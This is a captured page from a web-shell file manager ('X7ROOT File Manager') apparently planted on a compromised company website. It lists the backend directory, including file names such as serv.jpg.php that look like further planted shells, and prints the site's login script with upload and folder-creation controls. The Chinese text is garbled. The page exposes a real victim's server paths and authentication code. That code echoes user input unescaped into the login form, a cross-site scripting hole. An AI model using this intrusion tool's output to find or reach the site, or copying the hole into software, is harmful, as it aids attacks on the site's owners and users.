X7ROOT File Manager
Current Path:
/var/www/vhosts/hwtw.com.tw/httpdocs/backend
var
/
www
/
vhosts
/
hwtw.com.tw
/
httpdocs
/
backend
/
đ
..
đ
.DS_Store
(14 KB)
đ
.htaccess
(1.33 KB)
đ
529.php
(2.07 KB)
đ
HanszxzV.html
(1.72 KB)
đ
acl.php
(501 B)
đ
acl_s.php
(3.8 KB)
đ
acl_u.php
(1.84 KB)
đ
acl_xml.php
(3.92 KB)
đ
admin.php
(5 B)
đ
admin_data.php
(6.48 KB)
đ
admin_i.php
(3.21 KB)
đ
admin_s.php
(15.22 KB)
đ
admin_u.php
(4.11 KB)
đ
alertifyjs
đ
assets
đ
auth_check.php
(6.2 KB)
đ
batchdelete.php
(236 B)
đ
bootstrap
đ
changesort.php
(238 B)
đ
changestatus.php
(255 B)
đ
ckeditor
đ
config
đ
css
đ
datetimepicker
đ
favicon.ico
(596 B)
đ
func
đ
getclass.php
(376 B)
đ
images
đ
index.php
(3 B)
đ
index_class.php
(5 B)
đ
index_class_data.php
(3 B)
đ
index_class_s.php
(7.09 KB)
đ
index_img.php
(3 B)
đ
index_img_data.php
(7.05 KB)
đ
index_img_i.php
(3.2 KB)
đ
index_img_s.php
(13.7 KB)
đ
index_img_u.php
(3.74 KB)
đ
js
đ
kcfinder
đ
list_category.php
(1.89 KB)
đ
login.php
(5.66 KB)
đ
logout.php
(104 B)
đ
menu.php
(2.44 KB)
đ
news.php
(1.04 KB)
đ
news_class.php
(1.27 KB)
đ
news_class_data.php
(7.65 KB)
đ
news_class_i.php
(3.21 KB)
đ
news_class_s.php
(15.99 KB)
đ
news_class_u.php
(3.75 KB)
đ
news_data.php
(18.27 KB)
đ
news_i.php
(3.21 KB)
đ
news_s.php
(16.24 KB)
đ
news_u.php
(3.74 KB)
đ
peli.php
(3.22 KB)
đ
product.php
(1.46 KB)
đ
product_class.php
(1.27 KB)
đ
product_class2.php
(1.07 KB)
đ
product_class2_data.php
(8.04 KB)
đ
product_class2_i.php
(3.21 KB)
đ
product_class2_s.php
(17.6 KB)
đ
product_class2_u.php
(3.75 KB)
đ
product_class_data.php
(9.07 KB)
đ
product_class_i.php
(4.01 KB)
đ
product_class_s.php
(9.69 KB)
đ
product_class_u.php
(3.75 KB)
đ
product_data.php
(8.13 KB)
đ
product_i.php
(3.17 KB)
đ
product_s.php
(15.11 KB)
đ
product_u.php
(3.72 KB)
đ
public_include.php
(372 B)
đ
serv.jpg.php
(11.91 KB)
đ
sortable.php
(1.56 KB)
đ
start.php
(383 B)
đ
start_data.php
(202 B)
đ
start_s.php
(14 KB)
đ
support.php
(1.29 KB)
đ
support_data.php
(3.88 KB)
đ
support_s.php
(8.17 KB)
đ
support_u.php
(3.7 KB)
đ
template.php
(11.03 KB)
đ
toastr
đ
top.php
(1.62 KB)
đ
web_setting.php
(1018 B)
đ
web_setting_data.php
(3.53 KB)
đ
web_setting_u.php
(3.75 KB)
Editing: auth_check.php
<?php require_once 'public_include.php'; if (!Session::get('login_flag', SESSION_BACKEND)): if (isset($_POST['flag'])) { $m_id = $_POST['m_id']; $m_pwd = $_POST['m_pwd']; $data1 = array( 'm_id' => $m_id, 'status' => 1, ); $field = array('id', 'm_name', 'm_pwd', 'status'); $member = $db->find('member', $field, $data1); if ($member[0]['id'] == '') { Func::msg_box('叺čæå¯įĸŧé¯čǤīŧ'); Func::go_to(-1); exit; } else if (!Password::verify($m_pwd, $member[0]['m_pwd'])) { Func::msg_box('叺čæå¯įĸŧé¯čǤ!'); Func::go_to(-1); exit; } else { Session::set('login_flag', true, SESSION_BACKEND); Session::set('login_flag1', true, SESSION_BACKEND); Session::set('member_id', $member[0]['id'], SESSION_BACKEND); Session::set('member_name', $member[0]['m_name'], SESSION_BACKEND); $data = array( 'client_ip' => Func::get_client_ip(), 'update_time' => date('Y-m-d H:i:s'), 'member_id' => $member[0]['id'], 'member_name' => $member[0]['m_name'], ); $db->insert('desktop_list', $data); Func::go_to($_SERVER['REQUEST_URI']); exit; } } ?> <!doctype html> <html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no"> <meta name="description" content=""> <meta name="author" content=""> <title>æĩˇčŗį˛žå¯åˇĨæĨåžå°įŽĄįįŗģįĩą</title> <!-- Bootstrap core CSS --> <link href="bootstrap/css/bootstrap.css" rel="stylesheet"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.6.3/css/font-awesome.min.css"> <link href="https://cdn.jsdelivr.net/sweetalert2/4.0.9/sweetalert2.min.css" rel="stylesheet"> <link href="https://cdnjs.cloudflare.com/ajax/libs/toastr.js/latest/css/toastr.min.css" rel="stylesheet" /> <link href="css/lib.css" rel="stylesheet" type="text/css"> <link href="css/custome.css" rel="stylesheet" type="text/css"> <!-- Custom styles for this template --> <!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries --> <!--[if lt IE 9]> <script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script> <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script> <![endif]--> <link href="css/page.css" rel="stylesheet" type="text/css"> </head> <body class="pages-login"> <div class="login-bg"></div> <div class="container"> <div class="row"> <div class="col-md-4 col-md-offset-4 col-xs-10 col-xs-offset-1"> <!-- begin login --> <div class="login"> <!-- begin brand --> <div class="login-header"> <div class="brand"> æĩˇčŗį˛žå¯åˇĨæĨåžå°įŽĄįįŗģįĩą </div> </div> <!-- end brand --> <div class="login-content"> <form id='login' action='' method='post' accept-charset='UTF-8'><INPUT TYPE="hidden" name="flag" value="true"> <div class="form-group"> <input type="text" class="form-control" placeholder="叺č" name='m_id' id='m_id' value="<?=$_POST['m_id']?>" required autofocus> </div> <div class="form-group"> <input type="password" class="form-control" placeholder="å¯įĸŧ" name='m_pwd' id='m_pwd' required autofocus> </div> <!-- <div class="checkbox"> <label> <input type="checkbox" name="remember-me" value="<?=$_COOKIE['remember-me'];?>"> č¨äŊæį叺čå¯įĸŧ </label> </div> --> <div class="login-buttons"> <button type="button" id="send" onclick="chk();" class="btn btn-block btn-lg btn-primary">éåē</button> </div> </form> </div> </div> <!-- end login --> </div> </div> </div> <!-- Bootstrap core JavaScript ================================================== --> <!-- Placed at the end of the document so the pages load faster --> <!-- sidebar --> <!-- wrapper --> <script src="assets/js/jquery.min.js"></script> <script src="assets/js/jquery.maskedinput.min.js"></script> <script src="https://cdn.jsdelivr.net/sweetalert2/4.0.9/sweetalert2.min.js"></script> <script src="bootstrap/js/bootstrap.min.js"></script> <script src="js/main.js"></script> <script src="js/lib.js"></script> <!-- IE10 viewport hack for Surface/desktop Windows 8 bug --> <script src="assets/js/ie10-viewport-bug-workaround.js"></script> <script> document.onkeydown = function(e) { var ev = document.all ? window.event : e; if (ev.keyCode == 13) { // åĻæéĩ᤿ä¸įæ¯ Enter įåäŊ $("#login").submit(); } } function chk() { if (document.getElementById("m_id").value == '') { alert('čĢčŧ¸å Ĩ叺čīŧ'); document.getElementById("m_id").focus(); return false; } if (document.getElementById("m_pwd").value == '') { alert('čĢčŧ¸å Ĩå¯įĸŧīŧ'); document.getElementById("m_pwd").focus(); return false; } document.getElementById("send").disabled = true; document.getElementById("login").submit(); } </script> </body> </html> <?php exit; else: // if(Session::get('member_id',SESSION_BACKEND)==''){ // Func::p_go_to('logout.php'); // exit; // } endif; ?>
Upload File
Create Folder